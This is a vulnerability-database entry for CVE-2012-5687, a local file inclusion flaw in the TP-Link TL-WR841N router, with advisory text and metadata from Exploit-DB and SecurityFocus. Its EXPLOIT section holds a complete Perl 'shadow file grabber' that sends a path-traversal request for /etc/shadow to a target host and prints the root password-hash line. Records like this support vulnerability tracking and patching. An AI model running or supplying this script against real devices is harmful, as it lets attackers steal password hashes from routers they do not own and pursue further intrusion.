Details of VAR-E-201210-0020

ID

VAR-E-201210-0020

CVE

cve_id:

CVE-2012-5687

Trust: 0.3

sources: BID: 56320

EDB ID

37982

TITLE

TP-Link TL-WR841N Router - Local File Inclusion - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 37982

DESCRIPTION

TP-Link TL-WR841N Router - Local File Inclusion.. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 37982

AFFECTED PRODUCTS

vendor:

tp link

model:

tl-wr841n router

scope:

version:

Trust: 1.0

sources: EXPLOIT-DB: 37982

EXPLOIT

source: https://www.securityfocus.com/bid/56320/info

TP-LINK TL-WR841N router is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the affected device. This may aid in further attacks.

TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n is vulnerable; other versions may also be affected.

#TP-LINK TL-WR841N Shadow file grabber#

#built by Pulse matan () madsec co il#

#enjoy#

use LWP::UserAgent;

$host = $ARGV[0];

chomp($host);

if($host !~ /http:\/\//) { $host = "http://$host";; };

my $ua = LWP::UserAgent->new;

$ua->timeout(30);

$lfi = "/help/../../../../../../../../etc/shadow";

$url = $host.$lfi;

$request = HTTP::Request->new('GET', $url);

$response = $ua->request($request);

my $html = $response->content;

if($html =~ /root/) {

print "root$' \n" ;

}

Trust: 1.0

sources: EXPLOIT-DB: 37982

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 37982

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 37982

TYPE

Local File Inclusion

Trust: 1.0

sources: EXPLOIT-DB: 37982

CREDITS

Matan Azugi

Trust: 0.6

sources: EXPLOIT-DB: 37982

EXTERNAL IDS

db:	EXPLOIT-DB	id:	37982	Trust: 1.9
db:	BID	id:	56320	Trust: 1.9
db:	EDBNET	id:	59132	Trust: 0.6
db:	NVD	id:	CVE-2012-5687	Trust: 0.3

sources: BID: 56320 // EXPLOIT-DB: 37982 // EDBNET: 59132

REFERENCES

url:	https://www.securityfocus.com/bid/56320/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/37982/	Trust: 0.6
url:	https://www.exploit-db.com/exploits/37982	Trust: 0.3

sources: BID: 56320 // EXPLOIT-DB: 37982 // EDBNET: 59132

SOURCES

db:	BID	id:	56320
db:	EXPLOIT-DB	id:	37982
db:	EDBNET	id:	59132

LAST UPDATE DATE

2022-07-27T09:30:17.989000+00:00

SOURCES UPDATE DATE

db:

BID

id:

56320

date:

2012-10-31T15:50:00

SOURCES RELEASE DATE

db:	BID	id:	56320	date:	2012-10-29T00:00:00
db:	EXPLOIT-DB	id:	37982	date:	2012-10-29T00:00:00
db:	EDBNET	id:	59132	date:	2012-10-29T00:00:00